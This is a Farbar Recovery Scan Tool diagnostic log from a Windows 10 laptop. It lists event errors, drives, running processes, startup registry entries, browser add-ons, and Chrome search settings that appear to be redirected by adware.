Description: The previous system shutdown at 5:55:47 PM on ‎4/‎14/‎2016 was unexpected.
 
Error: (04/13/2016 08:39:05 PM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: The HomeGroup Provider service depends on the Function Discovery Resource Publication service which failed to start because of the following error: 
%%1070
 
Error: (04/13/2016 08:39:05 PM) (Source: Service Control Manager) (EventID: 7022) (User: )
Description: The SSDP Discovery service hung on starting.
 
 
CodeIntegrity:
===================================
  Date: 2016-03-11 18:17:52.048
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume3\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2016-03-11 18:17:51.703
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume3\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2016-03-11 18:17:51.394
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume3\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2016-03-11 18:17:51.129
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume3\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2016-03-11 18:17:50.762
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume3\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2016-03-11 03:33:01.939
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume3\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2016-03-11 03:33:01.784
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume3\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2016-03-11 03:31:55.925
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume3\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2016-03-11 03:31:55.802
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume3\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2016-03-11 00:41:18.766
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume3\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.
 
 
==================== Memory info =========================== 
 
Processor: Intel® Core™ i5 CPU M 450 @ 2.40GHz
Percentage of memory in use: 73%
Total physical RAM: 3885.5 MB
Available physical RAM: 1031.03 MB
Total Virtual: 3885.5 MB
Available Virtual: 46.11 MB
 
==================== Drives ================================
 
Drive c: (OS_Install) (Fixed) (Total:273.4 GB) (Free:2.91 GB) NTFS ==>[system with boot components (obtained from drive)]
Drive d: (Data) (Fixed) (Total:180.26 GB) (Free:117.9 GB) NTFS
Drive w: (BIOS_RVY) (Fixed) (Total:12 GB) (Free:3.31 GB) NTFS ==>[system with boot components (obtained from drive)]
 
==================== MBR & Partition Table ==================
 
========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 465.8 GB) (Disk ID: 9C73A223)
Partition 1: (Not Active) - (Size=12 GB) - (Type=27)
Partition 2: (Active) - (Size=100 MB) - (Type=27)
Partition 3: (Not Active) - (Size=273.4 GB) - (Type=07 NTFS)
Partition 4: (Not Active) - (Size=180.3 GB) - (Type=07 NTFS)
 
==================== End of Addition.txt ============================
 
Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version:05-03-2016 01
Ran by RoNiN (administrator) on RONIN-LAPTOP (14-04-2016 18:38:45)
Running from C:\virus
Loaded Profiles: RoNiN & postgres (Available Profiles: RoNiN & postgres)
Platform: Windows 10 Home (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: Chrome)
Boot Mode: Normal
 
==================== Processes (Whitelisted) =================
 
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
 
(Google Inc.) C:\Program Files (x86)\Google\Chrome Remote Desktop\50.0.2661.22\remoting_host.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\LMS.exe
(Micro-Star International Co., Ltd.) C:\Program Files (x86)\System Control Manager\MSIService.exe
(MAGIX AG) C:\Program Files (x86)\Common Files\MAGIX Services\Database\bin\FABS.exe
(Microsoft Corporation) C:\Program Files (x86)\Common Files\Microsoft Shared\VS7Debug\mdm.exe
(Microsoft Corporation) C:\Windows\System32\mqsvc.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
(Thrustmaster®) C:\Program Files\Thrustmaster\FFB Racing wheel\drivers\amd64\tmInstall.exe
(Microsoft Corporation) C:\Program Files (x86)\Microsoft\Search Enhancement Pack\SeaPort\SeaPort.exe
(PostgreSQL Global Development Group) C:\Program Files (x86)\PostgreSQL\8.3\bin\pg_ctl.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome Remote Desktop\50.0.2661.22\remoting_host.exe
(PostgreSQL Global Development Group) C:\Program Files (x86)\PostgreSQL\8.3\bin\postgres.exe
(PostgreSQL Global Development Group) C:\Program Files (x86)\PostgreSQL\8.3\bin\postgres.exe
(PostgreSQL Global Development Group) C:\Program Files (x86)\PostgreSQL\8.3\bin\postgres.exe
(PostgreSQL Global Development Group) C:\Program Files (x86)\PostgreSQL\8.3\bin\postgres.exe
(PostgreSQL Global Development Group) C:\Program Files (x86)\PostgreSQL\8.3\bin\postgres.exe
(PostgreSQL Global Development Group) C:\Program Files (x86)\PostgreSQL\8.3\bin\postgres.exe
(RealNetworks, Inc.) C:\Program Files (x86)\Real\RealUpgrade\realupgrade.exe
(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.29.5\GoogleCrashHandler.exe
(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.29.5\GoogleCrashHandler64.exe
(ELAN Microelectronics Corp.) C:\Program Files\Elantech\ETDCtrl.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
(Microsoft Corporation) C:\Windows\System32\SettingSyncHost.exe
(ELAN Microelectronics Corp.) C:\Program Files\Elantech\ETDCtrlHelper.exe
(Google Inc.) C:\Users\RoNiN\AppData\Local\Google\Update\GoogleUpdate.exe
(Google Inc.) C:\Users\RoNiN\AppData\Local\Google\Update\GoogleUpdate.exe
(Micro-Star International Co., Ltd.) C:\Program Files (x86)\System Control Manager\MGSysCtrl.exe
(Creative Technology Ltd) C:\Program Files (x86)\Creative\THX TruStudio Pro\THXAudioCP\THXAudio.exe
(Citrix Systems, Inc.) C:\Program Files (x86)\Citrix\ICA Client\redirector.exe
(Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(Microsoft Corporation) C:\Windows\System32\InstallAgent.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(Google Inc.) C:\Users\RoNiN\AppData\Local\Google\Update\GoogleUpdate.exe
(Microsoft Corporation) C:\Windows\System32\schtasks.exe
 
 
==================== Registry (Whitelisted) ===========================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM\...\Run: [ETDCtrl] => C:\Program Files\Elantech\ETDCtrl.exe [3738336 2015-10-31] (ELAN Microelectronics Corp.)
HKLM\...\Run: [RtHDVCpl] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [10816544 2010-05-25] (Realtek Semiconductor)
HKLM\...\Run: [THXCfg64] => C:\windows\system32\RunDLL32.exe C:\windows\system32\THXCfg64.dll,RunDLLEntry THXCfg64
HKLM\...\Run: [ETDWare] => C:\Program Files\Elantech\ETDCtrl.exe [3738336 2015-10-31] (ELAN Microelectronics Corp.)
HKLM-x32\...\Run: [IAStorIcon] => C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorIcon.exe [284696 2010-04-13] (Intel Corporation)
HKLM-x32\...\Run: [MGSysCtrl] => C:\Program Files (x86)\System Control Manager\MGSysCtrl.exe [2486272 2010-06-04] (Micro-Star International Co., Ltd.)
HKLM-x32\...\Run: [THX Audio Control Panel] => C:\Program Files (x86)\Creative\THX TruStudio Pro\THXAudioCP\THXAudio.exe [1349632 2010-05-16] (Creative Technology Ltd)
HKLM-x32\...\Run: [CitrixReceiver] => "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Citrix\Receiver Updater.lnk"
HKLM-x32\...\Run: [TkBellExe] => "C:\Users\RoNiN\update\realsched.exe"  -osboot
HKLM-x32\...\Run: [ConnectionCenter] => C:\Program Files (x86)\Citrix\ICA Client\concentr.exe [407904 2015-04-08] (Citrix Systems, Inc.)
HKLM-x32\...\Run: [Redirector] => C:\Program Files (x86)\Citrix\ICA Client\redirector.exe [153952 2015-04-08] (Citrix Systems, Inc.)
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [595480 2016-03-20] (Oracle Corporation)
Winlogon\Notify\igfxcui: C:\WINDOWS\SYSTEM32\igfxdev.dll (Intel Corporation)
HKU\S-1-5-21-470165136-1162808608-978993673-1001\...\Run: [Google Update] => C:\Users\RoNiN\AppData\Local\Google\Update\GoogleUpdate.exe [144200 2015-08-28] (Google Inc.)
HKU\S-1-5-21-470165136-1162808608-978993673-1001\...\Run: [SideSync] => C:\Program Files (x86)\Samsung\SideSync4\SideSync.exe [9580864 2015-10-13] ()
HKU\S-1-5-21-470165136-1162808608-978993673-1001\...\Run: [MusicManager] => C:\Users\RoNiN\AppData\Local\Programs\Google\MusicManager\MusicManager.exe [7643136 2015-11-17] (Google Inc.)
ShellIconOverlayIdentifiers: [ SkyDrive1] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} => C:\Users\RoNiN\AppData\Local\Microsoft\OneDrive\17.3.5951.0827\amd64\FileSyncShell64.dll [2015-10-03] (Microsoft Corporation)
ShellIconOverlayIdentifiers: [ SkyDrive2] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} => C:\Users\RoNiN\AppData\Local\Microsoft\OneDrive\17.3.5951.0827\amd64\FileSyncShell64.dll [2015-10-03] (Microsoft Corporation)
ShellIconOverlayIdentifiers: [ SkyDrive3] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} => C:\Users\RoNiN\AppData\Local\Microsoft\OneDrive\17.3.5951.0827\amd64\FileSyncShell64.dll [2015-10-03] (Microsoft Corporation)
ShellIconOverlayIdentifiers-x32: [ SkyDrive1] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} => C:\Users\RoNiN\AppData\Local\Microsoft\OneDrive\17.3.5951.0827\FileSyncShell.dll [2015-10-03] (Microsoft Corporation)
ShellIconOverlayIdentifiers-x32: [ SkyDrive2] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} => C:\Users\RoNiN\AppData\Local\Microsoft\OneDrive\17.3.5951.0827\FileSyncShell.dll [2015-10-03] (Microsoft Corporation)
ShellIconOverlayIdentifiers-x32: [ SkyDrive3] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} => C:\Users\RoNiN\AppData\Local\Microsoft\OneDrive\17.3.5951.0827\FileSyncShell.dll [2015-10-03] (Microsoft Corporation)
 
==================== Internet (Whitelisted) ====================
 
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
 
Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\Parameters: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{9cc31965-f3ac-45a8-a3c1-a9ad1c45f485}: [DhcpNameServer] 192.168.6.1 64.134.255.2 64.134.255.10
Tcpip\..\Interfaces\{c78fcb73-f14a-4b1e-b0ad-7bf0f8fa0b67}: [DhcpNameServer] 192.168.1.1
 
Internet Explorer:
==================
BHO-x32: Adobe PDF Link Helper -> {18DF081C-E8AD-4283-A596-FA578C2EBDC3} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll [2012-09-23] (Adobe Systems Incorporated)
BHO-x32: RealNetworks Download and Record Plugin for Internet Explorer -> {3049C3E9-B461-4BC5-8870-4C09146192CA} -> C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\IE\rndlbrowserrecordplugin.dll [2013-04-16] (RealDownloader)
BHO-x32: Search Helper -> {6EBF7485-159F-4bff-A14F-B9E3AAC4465B} -> C:\Program Files (x86)\Microsoft\Search Enhancement Pack\Search Helper\SEPsearchhelperie.dll [2010-01-14] (Microsoft Corporation)
BHO-x32: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_77\bin\ssv.dll [2016-03-29] (Oracle Corporation)
BHO-x32: Skype Plug-In -> {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} -> C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\skypeieplugin.dll [2010-11-22] (Skype Technologies S.A.)
BHO-x32: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_77\bin\jp2ssv.dll [2016-03-29] (Oracle Corporation)
BHO-x32: Windows Live Toolbar Helper -> {E15A8DC0-8516-42A1-81EA-DC94EC1ACF10} -> C:\Program Files (x86)\Windows Live\Toolbar\wltcore.dll [2009-02-06] (Microsoft Corporation)
DPF: HKLM-x32 {02BCC737-B171-4746-94C9-0D8A0B2C0089} hxxp://office.microsoft.com/sites/production/ieawsdc32.cab
DPF: HKLM-x32 {67DABFBF-D0AB-41FA-9C46-CC0F21721616} hxxp://download.divx.com/player/DivXBrowserPlugin.cab
DPF: HKLM-x32 {6C269571-C6D7-4818-BCA4-32A035E8C884} hxxp://ccfiles.creative.com/Web/softwareupdate/su/ocx/15101/CTSUEng.cab
DPF: HKLM-x32 {E2883E8F-472F-4FB0-9522-AC9BF37916A7} hxxp://platformdl.adobe.com/NOS/getPlusPlus/1.6/gp.cab
DPF: HKLM-x32 {F27237D7-93C8-44C2-AC6E-D6057B9A918F} hxxps://connect.bedbath.com/dana-cached/sc/JuniperSetupClient.cab
DPF: HKLM-x32 {F6ACF75C-C32C-447B-9BEF-46B766368D29} hxxp://ccfiles.creative.com/Web/softwareupdate/su/ocx/15112/CTPID.cab
Handler-x32: cdo - {CD00020A-8B95-11D1-82DB-00C04FB1625D} - C:\Program Files (x86)\Common Files\Microsoft Shared\Web Folders\PKMCDO.DLL [2001-01-22] (Microsoft Corporation)
Handler-x32: livecall - {828030A1-22C1-4009-854F-8E305202313F} - C:\Program Files (x86)\Windows Live\Messenger\msgrapp.14.0.8089.0726.dll [2009-07-26] (Microsoft Corporation)
Handler-x32: msnim - {828030A1-22C1-4009-854F-8E305202313F} - C:\Program Files (x86)\Windows Live\Messenger\msgrapp.14.0.8089.0726.dll [2009-07-26] (Microsoft Corporation)
Handler-x32: skype-ie-addon-data - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\skypeieplugin.dll [2010-11-22] (Skype Technologies S.A.)
Handler-x32: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files (x86)\Common Files\Skype\Skype4COM.dll [2013-02-26] (Skype Technologies)
Filter-x32: application/x-ica - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-04-08] (Citrix Systems, Inc.)
Filter-x32: application/x-ica; charset=euc-jp - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-04-08] (Citrix Systems, Inc.)
Filter-x32: application/x-ica; charset=ISO-8859-1 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-04-08] (Citrix Systems, Inc.)
Filter-x32: application/x-ica; charset=MS936 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-04-08] (Citrix Systems, Inc.)
Filter-x32: application/x-ica; charset=MS949 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-04-08] (Citrix Systems, Inc.)
Filter-x32: application/x-ica; charset=MS950 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-04-08] (Citrix Systems, Inc.)
Filter-x32: application/x-ica; charset=UTF-8 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-04-08] (Citrix Systems, Inc.)
Filter-x32: application/x-ica; charset=UTF8 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-04-08] (Citrix Systems, Inc.)
Filter-x32: application/x-ica;charset=euc-jp - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-04-08] (Citrix Systems, Inc.)
Filter-x32: application/x-ica;charset=ISO-8859-1 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-04-08] (Citrix Systems, Inc.)
Filter-x32: application/x-ica;charset=MS936 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-04-08] (Citrix Systems, Inc.)
Filter-x32: application/x-ica;charset=MS949 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-04-08] (Citrix Systems, Inc.)
Filter-x32: application/x-ica;charset=MS950 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-04-08] (Citrix Systems, Inc.)
Filter-x32: application/x-ica;charset=UTF-8 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-04-08] (Citrix Systems, Inc.)
Filter-x32: application/x-ica;charset=UTF8 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-04-08] (Citrix Systems, Inc.)
Filter-x32: ica - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-04-08] (Citrix Systems, Inc.)
 
FireFox:
========
FF Plugin: @adobe.com/FlashPlayer -> C:\windows\system32\Macromed\Flash\NPSWF64_16_0_0_305.dll [2015-02-06] ()
FF Plugin: @esn/npbattlelog,version=2.6.2 -> C:\Program Files (x86)\Battlelog Web Plugins\2.6.2\npbattlelogx64.dll [2015-01-13] (EA Digital Illusions CE AB)
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files\Microsoft Silverlight\5.1.40416.0\npctrl.dll [2015-04-16] ( Microsoft Corporation)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\windows\SysWOW64\Macromed\Flash\NPSWF32_16_0_0_305.dll [2015-02-06] ()
FF Plugin-x32: @Apple.com/iTunes,version=1.0 -> C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll [2014-02-18] ()
FF Plugin-x32: @Citrix.com/npican -> C:\Program Files (x86)\Citrix\ICA Client\npicaN.dll [2015-04-08] (Citrix Systems, Inc.)
FF Plugin-x32: @esn/npbattlelog,version=2.6.2 -> C:\Program Files (x86)\Battlelog Web Plugins\2.6.2\npbattlelog.dll [2015-01-13] (EA Digital Illusions CE AB)
FF Plugin-x32: @Google.com/GoogleEarthPlugin -> C:\Program Files (x86)\Google\Google Earth\plugin\npgeplugin.dll [2013-10-07] (Google)
FF Plugin-x32: @java.com/DTPlugin,version=11.77.2 -> C:\Program Files (x86)\Java\jre1.8.0_77\bin\dtplugin\npDeployJava1.dll [2016-03-29] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.77.2 -> C:\Program Files (x86)\Java\jre1.8.0_77\bin\plugin2\npjp2.dll [2016-03-29] (Oracle Corporation)
FF Plugin-x32: @messenger.yahoo.com/YahooMessengerStatePlugin;version=1.0.0.6 -> C:\Program Files (x86)\Yahoo!\Shared\npYState.dll [2011-06-16] (Yahoo! Inc.)
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files (x86)\Microsoft Silverlight\5.1.40416.0\npctrl.dll [2015-04-15] ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=14.0.8081.0709 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2009-07-10] (Microsoft Corporation)
FF Plugin-x32: @Motive.com/NpMotive,version=1.0 -> C:\Program Files (x86)\Common Files\Motive\npMotive.dll [2010-11-08] (Alcatel-Lucent)
FF Plugin-x32: @real.com/nppl3260;version=16.0.2.32 -> C:\Users\RoNiN\Netscape6\nppl3260.dll [2013-07-11] (RealNetworks, Inc.)
FF Plugin-x32: @real.com/nprndlchromebrowserrecordext;version=1.3.2 -> C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\MozillaPlugins\nprndlchromebrowserrecordext.dll [2013-04-16] (RealNetworks, Inc.)
FF Plugin-x32: @real.com/nprndlhtml5videoshim;version=1.3.2 -> C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\MozillaPlugins\nprndlhtml5videoshim.dll [2013-04-16] (RealNetworks, Inc.)
FF Plugin-x32: @real.com/nprndlpepperflashvideoshim;version=1.3.2 -> C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\MozillaPlugins\nprndlpepperflashvideoshim.dll [2013-04-16] (RealNetworks, Inc.)
FF Plugin-x32: @real.com/nprpplugin;version=16.0.2.32 -> C:\Users\RoNiN\Netscape6\nprpplugin.dll [2013-07-11] (RealPlayer)
FF Plugin-x32: @realnetworks.com/npdlplugin;version=1 -> C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\npdlplugin.dll [2013-04-16] (RealDownloader)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.29.5\npGoogleUpdate3.dll [2016-01-31] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.29.5\npGoogleUpdate3.dll [2016-01-31] (Google Inc.)
FF Plugin-x32: @veetle.com/veetleCorePlugin,version=0.9.18 -> C:\Program Files (x86)\Veetle\plugins\npVeetle.dll [2010-10-15] (Veetle Inc)
FF Plugin-x32: @veetle.com/veetlePlayerPlugin,version=0.9.18 -> C:\Program Files (x86)\Veetle\Player\npvlc.dll [2010-09-21] (Veetle Inc)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll [2013-02-15] (Adobe Systems Inc.)
FF Plugin HKU\S-1-5-21-470165136-1162808608-978993673-1001: @nds.com/PlayerPlugin -> C:\Users\RoNiN\AppData\Local\DIRECTV Player\npPlayerPlugin.dll [2014-03-26] (DIRECTV)
FF Plugin HKU\S-1-5-21-470165136-1162808608-978993673-1001: @tools.google.com/Google Update;version=3 -> C:\Users\RoNiN\AppData\Local\Google\Update\1.3.29.5\npGoogleUpdate3.dll [2016-02-01] (Google Inc.)
FF Plugin HKU\S-1-5-21-470165136-1162808608-978993673-1001: @tools.google.com/Google Update;version=9 -> C:\Users\RoNiN\AppData\Local\Google\Update\1.3.29.5\npGoogleUpdate3.dll [2016-02-01] (Google Inc.)
FF Plugin HKU\S-1-5-21-470165136-1162808608-978993673-1001: NDS.com/PlayerPlugin -> C:\Users\RoNiN\AppData\Local\DIRECTV Player\npPlayerPlugin.dll [2014-03-26] (DIRECTV)
FF HKLM-x32\...\Firefox\Extensions: [{27182e60-b5f3-411c-b545-b44205977502}] - C:\Program Files (x86)\Microsoft\Search Enhancement Pack\Search Helper\firefoxextension\SearchHelperExtension
FF Extension: Search Helper Extension - C:\Program Files (x86)\Microsoft\Search Enhancement Pack\Search Helper\firefoxextension\SearchHelperExtension [2010-10-26] [not signed]
FF HKLM-x32\...\Firefox\Extensions: [quickprint@hp.com] - C:\Program Files (x86)\Hewlett-Packard\SmartPrint\QPExtension
FF Extension: SmartPrintButton - C:\Program Files (x86)\Hewlett-Packard\SmartPrint\QPExtension [2011-01-26] [not signed]
FF HKLM-x32\...\Firefox\Extensions: [{FCE04E1F-9378-4f39-96F6-5689A9159E45}] - C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\Firefox\Ext
FF Extension: RealDownloader - C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\Firefox\Ext [2013-07-11] [not signed]
 
Chrome: 
=======
CHR DefaultSearchURL: Default -> hxxp://www-searching.com/search.aspx?site=shdefault&prd=smw&pid=s&shr=d&q={searchTerms}&s=Unknown
CHR DefaultSearchKeyword: Default -> www-searching.com
CHR DefaultSuggestURL: Default -> hxxp://api.searchpredict.com/api/?rqtype=ffplugin&siteID=8661&dbCode=1&command={searchTerms}
CHR Profile: C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Google Docs) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2015-10-09]
CHR Extension: (Google Drive) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2015-10-28]
CHR Extension: (YouTube) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-09-26]
CHR Extension: (Google Search) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-10-28]
CHR Extension: (MightyText - SMS from PC & Text from Computer) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\dkfhfaphfkopdgpbfkebjfcblcafcmpi [2016-04-09]
CHR Extension: (Google Cast (Beta)) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\dliochdbjfkdbacpmhlcpmleaejidimm [2016-04-13]
CHR Extension: (Google Calendar) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\ejjicmeblgpmajnghnpcppodonldlgfn [2015-10-12]
CHR Extension: (Google Play Music) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\fahmaaghhglfmonjliepjlchgpgfmobi [2016-04-09]
CHR Extension: (Google Sheets) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2015-11-11]
CHR Extension: (Chrome Remote Desktop) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\gbchcmhmhahfdphkhkmpfmihenigjmpp [2016-04-09]
CHR Extension: (Google Cast (Beta)) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\gdijeikdkaembjbdobgfkoidjkpbmlkd [2016-03-02]
CHR Extension: (Google Docs Offline) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2016-03-22]
CHR Extension: (Google Keep - notes and lists) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\hmjkmjkepdijhoojdojkdfohbdgmmhki [2016-04-13]
CHR Extension: (Facebook Album & Photo Manager) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\lgiedegfmekolcplboelnmfoiefpcpfg [2015-08-15]
CHR Extension: (drumbit) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\mplpmdejoamenolpcojgegminhcnmibo [2016-02-03]
CHR Extension: (WeatherBug) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\njkkjobcechefaoknodniidfjapgfoco [2015-10-12]
CHR Extension: (Chrome Web Store Payments) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2016-04-09]
CHR Extension: (Picasa) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\onlgmecjpnejhfeofkgbfgnmdlipdejb [2015-08-15]
